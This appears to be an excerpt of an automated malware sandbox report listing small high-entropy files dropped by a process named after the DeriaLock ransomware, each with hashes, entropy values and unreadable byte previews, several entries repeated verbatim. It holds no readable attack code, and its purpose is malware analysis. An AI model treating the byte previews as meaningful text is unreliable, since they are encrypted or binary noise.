                                                                                                                                                            Preview:.Ay...m..qj]4....E..dNDi..m..)..m.a5....I...N.v)!O..o.LR.a....e.$......@.X6,ctc......5N../..........k_........,v)g..f...c.a...T<...l......h?u1.......6?..8G.tR.-r.M^[..'.:.vC&......fS!R.c)..}.}...j.....&......1.?.S.6.j......$..yC. .....k..iHE.O....D.Z....s..%#.oe?..@..!N..%Z..a.SR.....%VaJ-..vds......#.d....pp..q..I......N.....P\t.....*4...!..~|...y......G.....+9.'..._]#.d.. .}J4..~...$?'....e|B.z,...4>.._..r'6.o.%..;2.r....^s.`..!..P....h...........Z"X.<...\...;..cR...&0....kn....:R'....jV...<6..4,..).f....U........S..Z..cU.~w=.........j.......e.q.J..{.~ts.....|.i'......g..~O<i;B..&.....#..xb.3Z..(I.^...A~....+.>.......8z..6#.....;.NO..&.......E.2y....u.X^.HW....=.*...^.o..=.og..M......I..%.AST.C..7.....7........)K.......z.4.f...].x.|..-....w|..... .60..:SC... ...<..c....hm.uI9..n.UaJ..!)Xnv9.e};#r2..,..a.Dq...;1n.42.F..E..O`a.....m=5.w..q...+/OD.Ip.5B.o{..]........Q.....h.A.Y.9....r..?._.];B.\w...k.n..H"...*.^.\...W&.qh
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.832320840167231
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:YG3n38GOibo/adsp8cwfOA5wuJx1QZTbzAclYcnrJoLIPAlIW1D:N3MGOibo/+s+cw2A5wuJfMTb5tnrJoSe
                                                                                                                                                            MD5:AF3CEF2A8B95D3C95770302649D7A188
                                                                                                                                                            SHA1:2578FBE2A3863CE3F26C0C3871F9917FA91552D0
                                                                                                                                                            SHA-256:CF6AEE7772D8BF6830C8A8DA592017E4EE06C01E0B510C02B97D3CE76CAC902C
                                                                                                                                                            SHA-512:E1CCC92CF22815B5CE59407D3BB566644EE01931E031993EE04EE9F32CDF16A6F9CB4F09159ECD0799887EF9F4F106CCD7D473CDA69613228359C6D4906427E1
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:o..=.4.eb....Py....C2.BU.7{}.].&._.._{.f.T..E.Q.F6F..1....+*.(.pw.o/..O.5.O.-)b.e.31.`k.W%..7.........i*.......B.h%..Xl.....c.^......}.:q...6....>.....V.|1'.>.d;Z@..3q..F..j&..|..Ex.8..~..r8...wa,|..E...e.2.w.,iL.x/.0..#.l.e_....ke.AC.......`[...r.G2.Q..t...rb..p.{r.G.\....o...R....1i.....T..<F.10J.jA....$.h.?.9....).S*..3D..^../..x....#8#E...,a-.5....Vu.b...Dr....n..3......=..F&.9zgdh.....9:....n......_.e....i/.&.....z...a..d1...j....A.7..P_K.........8../>.I.e.u....<..... y*...fC.....<{pz.<+cc.....4.6..,..].'(.atg..U^..qg.V...a`Tb^#J...N4.>...X..zI+.w+..V._...H...86.?bXr.-."l.>..2\h.sp|.R..)..m..37...l.Y.^yi.he8..J*N.x.....`T6.s1.{%.n%.NT.+..9.-...G...P....v_.ms....,=.o.i.@.|}.j...5y....q.f...h...S.%.C..D;.^..h.........h..=.i.Q....G-..^....v. U..5..'......bK2C$..E.kTqM$``..%..$.)b...:...4.^.=]....\.A..pa....v.....~]...._.fI#.zHG'w3......x.Ci.....S.E.E......J.o:....}.H.#....}..0..._G..j.,..!.zT..n5K.*...z.....DS.aZ.%{.....(.s..Do.3.j........b..|R.
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.83428041195568
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:4u4fXgiuIEcS2wSo/C6RoVEEnHISo6twY8/CeAC8q/Y:4VfXgc9S2wSoPR6nDwYACeAC8F
                                                                                                                                                            MD5:C077A0A21A925D49EA1884B1DD66B92D
                                                                                                                                                            SHA1:F3BDF293557B38363D5C4C834013A008958278AC
                                                                                                                                                            SHA-256:3A41562696ADA8F54A5A1FC352C3FD40B0828616EDD9B19D223F83CCBB686029
                                                                                                                                                            SHA-512:C9DF7E58780244C7EE4951EE7BE3A013EFE960DEE1D36438473A64A410F7FD2EF850F01C4C6B461321D0635BDCAD65ABD0DF843C9AC856384C069980B5FDB2A4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:i....|-0"r..9..\`...5......k.].lZ.m.....N.G]O...i`.CGi...6.l.H.sMt..[.u............5t.[!.L..I....RY..}8...qJ.K{..J..B.}..;..8.&..Wk.-I.....:.k...N>..?W.U....p...x....~|.L.f.......{..B...a(..F....;bi....h.O^.>.lbc..{...}<<....[U'....)[.Y1... .ki...2..d.....p.5.n..*G.2...O.._...`..+.Q...Z(...g.....z.^....`:.g.d><.u[.4Z...;..T..\..?...^M..3$.3.7.&...................o..D...\.~6.Z.. ..........2...d.'#\x).'..c.VU|.J......h.{...M.....?.D.qy.~.t..U..-.W.TWB..._.&..s.T.d....65<......A/....8....3..m&..Kx....b]_`.UN.....@&.....d.[..A@....L4..I8p}.!..6..iHW..^..`.U!Ld....DHxWC..M.D)B...J._b._#.X....?.IFAJ...~m..5.!"..............Md..J14...p.+......Q.[..J..+F..]?zR+-.q,..=..K..].n..<...$.....>.qs'..yB.z...t.xR[....{..p.1R..c....oK.c/+.._.....N..$F^.y..,..@B....'.]se..H;....0.v....e...d.-M/.......T ..V`Hk.4=..p}a../.].or)..3T....l.*....*/T....>-wB.....fT:\Wk8..XxX.............4.!...r..vY...,.d.*..A..w.d...#..D.*..~.y.......,.k.a..-a.!=)...1....
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.800745497690196
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:XsGLLPnnkdskjQlqisMx3MgUGJCI34fIPVHd9khCX9hEhSp:86LfkdswcqC+g54fIPNdOhCXFp
                                                                                                                                                            MD5:22CDBE124561588F63E105186CA20872
                                                                                                                                                            SHA1:7AC100C0ED722F512A00E3EF18956F53377767E1
                                                                                                                                                            SHA-256:192B1922FC05B3A2CCCB1FD78DF0124C9FCAA427581071711AA57DC90CE40CF9
                                                                                                                                                            SHA-512:34266E9984A8C29229B21ED73AF83E36892E9C7CF177C2ADFFE96BEFC4B7D595A887A53C2D284B5B354F057AAB6720A31AE92B2BAF5F6E44A0482F7EC5991C7F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:O/t.}\5.....q.C....m.,...(.2.m....?.d~.>..s..M.<.}.*|..>.mm.....4lx.[.@..2..v..d2`x...y...S...{J.......K...D_.9T...z.......W#>....E...`....+...e .0<...}. s?E..d.k9.....g.z...E...W.#~o.G.E..ot.X..S.c,).+G&I6.1......lLH..;)....En...`..o.......'{.1 s...o1......3...Cv..6.3....u....|d ...|4..+....,O...J.........2.......W....).;..|...7...F:a.raE}F.3.6.....G..g..=.}m.V....>../.,#.Zo.G...}...i5.#.Q>..2~U<.X.b..(...k3^......><...!.?.\.a.vO.....q.*2....t...Siy...=?Y..Zd..B8...O'.Z`........%..O....U..i.{.|T.Oc.<..T<:'dZ......?QW...@.-..~..R)..v.....j.2......... ...9.p.%mX....*l!...G..Y3..;.-............c..l...6.......%.1...zy6..)d.Rg.....o..F...wx.w..A.,.^.R.....Q=...HG34.....y..+.%-.6;;*.4...+.0..g._F.....a#..g+$q.K,.l..&..(.X.`..4.R4...U...A.Q.(....r...........c...q.p........S.z^H.......,.6D.S:.."B._....nu&G!Np.F.._..=....<........@{..;]..i......|.|(%.2..7.)...LO...x\...=..4d....F.:\.l....c.(.:.........y...&.v....e.d....t_..........T0.
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.7967193226263385
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:JA1Efk3iMyXwZOowJm3MJGy4IzxF8zVC343IZnmMZTLkgX:JA1cMIowJXwMzE41mMp1X
                                                                                                                                                            MD5:B05B7B29838A11F73119CB784A431D2F
                                                                                                                                                            SHA1:FE5C90FEC021AA925D86E699FED1A1B46A507888
                                                                                                                                                            SHA-256:FED0582C7E8A2BF0BCF8F3F5B2354F3B0A0A1ABF9B30A87968A4F31B2EC32436
                                                                                                                                                            SHA-512:D1A00A94DCB6E7EFB7664150317132C17A605BD0BFD8E178B20A6AF48BBA40A5E23EE1B7A3170FFD51D402DD119373B7FD402304384629D42FD3584A3E229149
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:.8........PL.6.=P......T.>.g^;.=..@..1%v)...^..!Cf......(.:f...4...5..R.+...H.....Ol ...~".zD~../H.vg?../a..k.B.5....1....j.4`......j......12..i)JX..{....m%.(c.....E../w..D..R......w.z.Y80...;.lZ.,..p.F+.n..Xq.P....{5..4..s.J...H.EK{t.r.H.e....{...5x1.......~./...E.|..p....F.J._..6...L|_.......kd..D.9.2..3Y.....Q2.%.#.+'{............TN|{.N.....!..t.......|2\k?X..+......3....?..[....K..w..?..|.@&S.N...y.".J..C....b.).,..u.Q.....7j.p.o..j.j.C.K.).~.E..'.&ugk#e.3.w...W.{.Q............}$O5u.o.(....C'{."b..F.D:.tG.BA5.....L+ .`.....5....SQ...-.......S4..\...^p&S...o..J...c....b.5...M.....7f..L...]...j.i)..~.-..YXaW..G.L..[.Q.-.U:..6-.m..(..=n%.......h..^EG^..B.X,...G6.3s...I.& O.$*&.|8..E....z....y=.tq.......ES:.vD{.2...~.).[.!...<.9Y....O.^D..o..L....z#.?..mv.8.S&....L..J.L.V.[..)...Dh...h.....L-wL.6..c:..I..*..w.O8.)..O8.......5&~....).N..Bg7..k...M.....h.y...N._.&2....X..k.....]....>.....Dm*.&.F..RS.6!O....w+..d.`........0...Fh
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.7967193226263385
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:JA1Efk3iMyXwZOowJm3MJGy4IzxF8zVC343IZnmMZTLkgX:JA1cMIowJXwMzE41mMp1X
                                                                                                                                                            MD5:B05B7B29838A11F73119CB784A431D2F
                                                                                                                                                            SHA1:FE5C90FEC021AA925D86E699FED1A1B46A507888
                                                                                                                                                            SHA-256:FED0582C7E8A2BF0BCF8F3F5B2354F3B0A0A1ABF9B30A87968A4F31B2EC32436
                                                                                                                                                            SHA-512:D1A00A94DCB6E7EFB7664150317132C17A605BD0BFD8E178B20A6AF48BBA40A5E23EE1B7A3170FFD51D402DD119373B7FD402304384629D42FD3584A3E229149
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:.8........PL.6.=P......T.>.g^;.=..@..1%v)...^..!Cf......(.:f...4...5..R.+...H.....Ol ...~".zD~../H.vg?../a..k.B.5....1....j.4`......j......12..i)JX..{....m%.(c.....E../w..D..R......w.z.Y80...;.lZ.,..p.F+.n..Xq.P....{5..4..s.J...H.EK{t.r.H.e....{...5x1.......~./...E.|..p....F.J._..6...L|_.......kd..D.9.2..3Y.....Q2.%.#.+'{............TN|{.N.....!..t.......|2\k?X..+......3....?..[....K..w..?..|.@&S.N...y.".J..C....b.).,..u.Q.....7j.p.o..j.j.C.K.).~.E..'.&ugk#e.3.w...W.{.Q............}$O5u.o.(....C'{."b..F.D:.tG.BA5.....L+ .`.....5....SQ...-.......S4..\...^p&S...o..J...c....b.5...M.....7f..L...]...j.i)..~.-..YXaW..G.L..[.Q.-.U:..6-.m..(..=n%.......h..^EG^..B.X,...G6.3s...I.& O.$*&.|8..E....z....y=.tq.......ES:.vD{.2...~.).[.!...<.9Y....O.^D..o..L....z#.?..mv.8.S&....L..J.L.V.[..)...Dh...h.....L-wL.6..c:..I..*..w.O8.)..O8.......5&~....).N..Bg7..k...M.....h.y...N._.&2....X..k.....]....>.....Dm*.&.F..RS.6!O....w+..d.`........0...Fh
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.811933715876561
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:z+Hxc3nG4y7/pPQ998QmShO71IPXhTkxC8Tn58:zawG4ytASQpA71kVkxC8L58
                                                                                                                                                            MD5:356331CEF6D8EF76AFAC10090710272D
                                                                                                                                                            SHA1:B1A601FC4986EF6AFE8DE37EBBD3083ABF31446E
                                                                                                                                                            SHA-256:BA5305F741B8ED5EAADAC7F48D5AE59C8AFF0CBF21087783B775F400623974AC
                                                                                                                                                            SHA-512:992E3F8A6704D8BE63D3919535CCDD66B469C2438CEEAF82B50B6E446D11833A6A97577F66B58E8933768DBEF3F17C66253E97F446D08D8C18D98150CF31EFFD
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:...`1...s...`.+.}D.pIv../..C.]Z.e..............X2..)K-...V...3....E..pUu..*..5..6...u....B.\N.h..d".G>.......D........B.S.*....O.N..S2.K5(Q.?.B.....N.....;X(3O..qR.... .F,.].....G...E._->.......a..%R...w....XQu3..1......F.?........I....7>.#.h.....Pq..$.....jD0...6.b'.)..[...T"?.D.......2Gg:=6R......j.#3...MJj+..gp..J....G..@..gktv...}....1...G.O/m!.NF...l.]..$..+..#.......* .......=.!c....4..q.......+o..4'.y1..'.=..PN\..J..&..<E..0.K..."..|...^[......Zr...6.2v.O..q..#...&........Za.Q(.....D....s.........^.V....Sq.vb.......OyO...,E<0.t.yj;...~.....}E.W.:.@.Y.m..3-..s?.J...W.?...rV.?}....U...o(f...c$XZ3.cJcS.../.^iv....["|.....~..6..R.G.s....8.nuX.....w..f;..m.f.....O*RCIhI#....K.r+.j.k!....(..._..T....*.....[.6vi......e@.N.Gy.5.\.(..?.X.~.*..'.f.s1..vPs.h(..svG..d.oL...K.=......:Z.?h..../.g.#.B......e_..r$..D5*8B...:..'.`.A....Z.'.yMp..1......n.Yw(.yw9.&.][..{...jX..0..9u).../k..g. . .Z..5c...x..5...=...p..!...6.b6..r..........i...
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.811933715876561
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:z+Hxc3nG4y7/pPQ998QmShO71IPXhTkxC8Tn58:zawG4ytASQpA71kVkxC8L58
                                                                                                                                                            MD5:356331CEF6D8EF76AFAC10090710272D
                                                                                                                                                            SHA1:B1A601FC4986EF6AFE8DE37EBBD3083ABF31446E
                                                                                                                                                            SHA-256:BA5305F741B8ED5EAADAC7F48D5AE59C8AFF0CBF21087783B775F400623974AC
                                                                                                                                                            SHA-512:992E3F8A6704D8BE63D3919535CCDD66B469C2438CEEAF82B50B6E446D11833A6A97577F66B58E8933768DBEF3F17C66253E97F446D08D8C18D98150CF31EFFD
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:...`1...s...`.+.}D.pIv../..C.]Z.e..............X2..)K-...V...3....E..pUu..*..5..6...u....B.\N.h..d".G>.......D........B.S.*....O.N..S2.K5(Q.?.B.....N.....;X(3O..qR.... .F,.].....G...E._->.......a..%R...w....XQu3..1......F.?........I....7>.#.h.....Pq..$.....jD0...6.b'.)..[...T"?.D.......2Gg:=6R......j.#3...MJj+..gp..J....G..@..gktv...}....1...G.O/m!.NF...l.]..$..+..#.......* .......=.!c....4..q.......+o..4'.y1..'.=..PN\..J..&..<E..0.K..."..|...^[......Zr...6.2v.O..q..#...&........Za.Q(.....D....s.........^.V....Sq.vb.......OyO...,E<0.t.yj;...~.....}E.W.:.@.Y.m..3-..s?.J...W.?...rV.?}....U...o(f...c$XZ3.cJcS.../.^iv....["|.....~..6..R.G.s....8.nuX.....w..f;..m.f.....O*RCIhI#....K.r+.j.k!....(..._..T....*.....[.6vi......e@.N.Gy.5.\.(..?.X.~.*..'.f.s1..vPs.h(..svG..d.oL...K.=......:Z.?h..../.g.#.B......e_..r$..D5*8B...:..'.`.A....Z.'.yMp..1......n.Yw(.yw9.&.][..{...jX..0..9u).../k..g. . .Z..5c...x..5...=...p..!...6.b6..r..........i...
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.780049732096254
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:dSRxY99DapdENpF0m4qUyv1zavUmaQLhbh4DUDO:GxY7DapdsH4xyvxd9EhbMUDO
                                                                                                                                                            MD5:0D72E9C5394B438F959CB19649EF7C31
                                                                                                                                                            SHA1:A5FED6D805F250A2758EDC8975EB6631E1E359E9
                                                                                                                                                            SHA-256:0CD930F919B56058AA93D969546869C02D266377E627A6885F5557FC692AE0A8
                                                                                                                                                            SHA-512:CA14020CF1FD91772DF88A4EA158451A04657380F475DCF317F0683CE684173AB2335E4C47D9C34DFE3FF6BDABFDF54504181565E15A9042A6DEBCED27D34B07
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:Z){..[.\...6.$...r..T..{$P`jW......-Zr../|.3...j..I9QQ.dW......m.x..uPj.B...p...F....oQ.k...5)...Q.....1`.............S...sq~k.j0...,3B1....uU.3.o..]....K..9A...@.]...../......=...e..Q2..Zt..np...u....E.........s.>...@78V.p.s.)...)ba..P.i[N*.0....l.I..Y...?.M>...)...8%.s[.N..8.......M6.5.0}`\w.7. .T.z.E..F..e...1.b...H..%..2.l.(...a..C....!.Cx...=.?F.Dtq.MX...n...[...N..#...e./(..}<|I.#"..9[p...9..H]...7O;.(...V..7A....Z.=.bW...q....#.....k....h7hnX.9.c[...#.0P._.......p........f.#.N..%..$.W..l.Kz>.$.O|.=....;a>...ec.:.D.i....?...... .w.=7~....\s...le...W....PL^8..*..b)HA...Y9Y.h..jAn}.........9g.....7...5.9..m....(...z.C1g.{..GT.._..MI.8...V)I&.%..!P..".l.T...*.-.g.Y)....E....}A.......[..B...h..u..G..W........P...R.Vz..:.s...eO.MV.Y...x..z..I..s..8%.l....v.6...`F...7...[;.M....>X.h."g.$)..2k..p.M....85.p[.!v.!.8f..97..y.2T..1nE.<.[......p/..q.c...ht...w...w.. ..8f.A.;...b9.....j....2.[...4.F.....z...../=~]c,.....c.g....:.{70.
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.780049732096254
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:dSRxY99DapdENpF0m4qUyv1zavUmaQLhbh4DUDO:GxY7DapdsH4xyvxd9EhbMUDO
                                                                                                                                                            MD5:0D72E9C5394B438F959CB19649EF7C31
                                                                                                                                                            SHA1:A5FED6D805F250A2758EDC8975EB6631E1E359E9
                                                                                                                                                            SHA-256:0CD930F919B56058AA93D969546869C02D266377E627A6885F5557FC692AE0A8
                                                                                                                                                            SHA-512:CA14020CF1FD91772DF88A4EA158451A04657380F475DCF317F0683CE684173AB2335E4C47D9C34DFE3FF6BDABFDF54504181565E15A9042A6DEBCED27D34B07
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:Z){..[.\...6.$...r..T..{$P`jW......-Zr../|.3...j..I9QQ.dW......m.x..uPj.B...p...F....oQ.k...5)...Q.....1`.............S...sq~k.j0...,3B1....uU.3.o..]....K..9A...@.]...../......=...e..Q2..Zt..np...u....E.........s.>...@78V.p.s.)...)ba..P.i[N*.0....l.I..Y...?.M>...)...8%.s[.N..8.......M6.5.0}`\w.7. .T.z.E..F..e...1.b...H..%..2.l.(...a..C....!.Cx...=.?F.Dtq.MX...n...[...N..#...e./(..}<|I.#"..9[p...9..H]...7O;.(...V..7A....Z.=.bW...q....#.....k....h7hnX.9.c[...#.0P._.......p........f.#.N..%..$.W..l.Kz>.$.O|.=....;a>...ec.:.D.i....?...... .w.=7~....\s...le...W....PL^8..*..b)HA...Y9Y.h..jAn}.........9g.....7...5.9..m....(...z.C1g.{..GT.._..MI.8...V)I&.%..!P..".l.T...*.-.g.Y)....E....}A.......[..B...h..u..G..W........P...R.Vz..:.s...eO.MV.Y...x..z..I..s..8%.l....v.6...`F...7...[;.M....>X.h."g.$)..2k..p.M....85.p[.!v.!.8f..97..y.2T..1nE.<.[......p/..q.c...ht...w...w.. ..8f.A.;...b9.....j....2.[...4.F.....z...../=~]c,.....c.g....:.{70.
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.853787439090422
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:lZxqZzBAYZwlXdnVzztOpEEHrZUhypfY70jW0aOim0N:lZMZlAYZInhztOGYNUhUYH0DuN
                                                                                                                                                            MD5:0A01B3798EB4FE98BAAC2FE554089063
                                                                                                                                                            SHA1:923C575B795FE5B2F4628AC82312AD08F598C3FE
                                                                                                                                                            SHA-256:C5567F0BDA1C8B85DC7D3AE52DC29797C1EECD4C3042CD0ED4B829114B6C6334
                                                                                                                                                            SHA-512:025EA3B1226427B96E8A9C5CCD90B9957D6D9BD37553FB16164A83EB3AB3F849041CA81BFC30104B86D1EB5FF0C7E10DCD57E172F6C392A0592D64EF76889A2D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:..m~.}>.8. .....f3......FN.!.^....]..[Z..q...gM.xE...X....a...#.E_..{P.2j...+pL...1T..1........O.....H.S..5c....bm..k..c(...WF.v.D...re.l..X.J...|G..r....W!...}...*.W..7.W.=4.)....n..I.S@..g*..0D.6.....z.}.B"^T:Q....a'.2.BC{....k^."....K....Eu..1.}.._.f.o.M.S.z..aL..U.}...w.^....N....9.[ADL..!\0.......+.'..Wm...!.+e.r.0W......Q........3.6$....b....|.+.V}.=..i.|...S.ZM....4C.fw..{\.Is4Z.v\`...!.w.9.<.'....;U&....x......N..#..."=....+.....;F.. m.8W..bH.....\!....\&.3.......:@,...6ZD.La.Z.9.`c9.f..mMF.......6.J.Y..J....VV....a...3$...R...M6.m.N..f..6.........:?.. ...I....Q.=..#tPxD.98...|....:qt.y.7../.w._.....0Z..9J..[.c%r..F.<.T..`X..(...A.[..s.(II.;.[v.B.v.....f..x.../..{.][T.Q$.#.n7...R...@....$.,.[.a......8.7..q...k.3.<.~ 9....u....S\#-.O.,....7.Y.dl...|... ..I.S..7....Vp:...C....q.U*.....,w..2;.^.gu...7....rR..Q.TY........@.....Xqt'U..n...I...j1.............T...h0.Cf(....|...]..+.j/.\M....#Q\p%.U..Gb&.!Y).....t.....
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.805673912386634
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:RfNURiFuNvh0q2nv1qfjGKPuna6L/4Yo7x8r/P2QiSabgwEk2:Opnkv1QNPuaO45mr/P2Q/abgwEk2
                                                                                                                                                            MD5:62ED3197638DAB2813ECAA8DA670EB5D
                                                                                                                                                            SHA1:249F90D633B3B02FE18974FEE3B82B2124E8E74E
                                                                                                                                                            SHA-256:49BAFE621C98A3E34C3A5EB993819BE2C6508884E3DE4A87A014CC5A7FA7C3B5
                                                                                                                                                            SHA-512:FAFFEE139C60B996621020EEF46D16E836F1444DB9722FC382EB148B33D4C8C8E7915055F063F003F90E88883E667601C4A44DF0962FB8DF871B6F4694060B2E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:b.&.1P:.$....u*gX%.t...m./$.q..)N...R.8.+....m*.[.qT.B..7.v.8V...^.h.+7u/..;.....aQ|...pX... <.a,..t.9.Go.G..W...7(....RGK.{ZSd.....r.%O...H..N...n>.MD.?..UZ(H8*.uN^>.._L...D2.>8|.U.......|.(....Qa..jW.VM?...x.."_....5..`...u.-.....iy..Q..9.........,..;~..x.E.p ........e..j.]..{...fQ.`...x.....78..>..KN=.s..h....n...G.?oELo..f%..W.J...S>.(g.w(..+...fT......r_.e..[~.<.....Q.J.;......ck...Dw..8v...AZ.IX..t.i=.{X.2Ok.|..@...L-.[|l/'.?.m.@8).o..;ii..QP...H....M..z....%..hQ:[.7.L].....&..N..;...*......o..Ks"..AG<K.f..?....,....E.....;..K...k....m.......t(..C..t...R.....}..#V.r...............E...k........s..m..ur..8k5.`w.o}...M,.).tY....S.....\.=~nW.B.9..X....$BX..}..l..<.osL..7`..7..}pu4.....^.N...;..vjvb..........A..G......`..).Nb.5.)l...G.'....z..:d..xa..`.+.W..N0.S...'I...?.`...(@...k.....W.....J..x.7.S....B=TV....r.......>.....#...W....q...J....8.EWa.....EH/V.....UF.. .x..U.3twE.....{[?...2DD(...:.4......q#..."(..+..d...1..XKz.'..<.hx..
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.804586333500998
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:qwar67cTyIKhGfUyjnW2//PbebZvyDy7flplFwGenwq:qwar64TxKhWjnW0nbeV53/wv
                                                                                                                                                            MD5:20320135C3A82A99F13EE05F92B49E79
                                                                                                                                                            SHA1:1B746F99B48C637E4ED5364C8F3ED22C9A277CEB
                                                                                                                                                            SHA-256:903FC73D7E6A9C677252917976A95B69AB8AE481ED7358FC4D0E06FA115D0A64
                                                                                                                                                            SHA-512:84B16C2396C97F124FFE75ED6126CE2BA82824A2F6C1A79D7ED940BB1E36EB739A6CCEF49261CB9760AF15E6FD4569FD96C216287DBC8206CAFF18AC5F7AE7DE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
                                                                                                                                                            Preview:.&..z..A....*a.7=...]......8R:.......*...F\.)...J...<U.=..7........@?.:;......>.X`{.....E...L.~s...{.]l.j..q.....'.D.Wp.0.G...>q.......^...Ma..JFB9Jrk......@^..1.l...|......uS.H.g..&..k.A..T.h....c/z'5.pk........x7).3$.Ly.CO-Z...(A$p.u`..+....G.rQ...~.(.....vB....,\y............yT.IZ.3...:6.H.#..C....c.z..`..F.\.(..[.z...=.=.&..Z....k.....6....ar...e.<L...y..lO.N.X.BZ....\.....1D...iG.....[...*2>..sR....l.....0./A.Q...P...b.A>Q../.U..45Hn..v.*..5".2...9...e.D..Jn.c....}N=..i.'*....T.w...+A.^.+.p..S.N.v.s.M..@....^C.l..b...y^.......W.j....r..@Lg...y&..9...1K...."......t.h.....jf.'..i*.xsd......@w}.Fk....n+.w.X.D...J.,....KC..+......X~..S~.O..T..XZJ...L.2o.......TT.......U..@....y.n.p. {O.j..n....1..\..5'.3...{Y!R....9r..9~l...X..RI..d......@.q...0Z.1.f.....V.R3..a.Z.....!.M..+.#j....8.H....J...7..7..ai...J....>$.......x.x.Q`..4....O..0&$...t5;.0..Z~.5....E.8ITi....2.;....I...1..V...4=...S.y.2..S...+......ly..]A. .eJ.C~......&gj.-E1).^.....!....
                                                                                                                                                            Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1040
                                                                                                                                                            Entropy (8bit):7.804586333500998
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:qwar67cTyIKhGfUyjnW2//PbebZvyDy7flplFwGenwq:qwar64TxKhWjnW0nbeV53/wv
                                                                                                                                                            MD5:20320135C3A82A99F13EE05F92B49E79
                                                                                                                                                            SHA1:1B746F99B48C637E4ED5364C8F3ED22C9A277CEB
                                                                                                                                                            SHA-256:903FC73D7E6A9C677252917976A95B69AB8AE481ED7358FC4D0E06FA115D0A64
                                                                                                                                                            SHA-512:84B16C2396C97F124FFE75ED6126CE2BA82824A2F6C1A79D7ED940BB1E36EB739A6CCEF49261CB9760AF15E6FD4569FD96C216287DBC8206CAFF18AC5F7AE7DE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:unknown
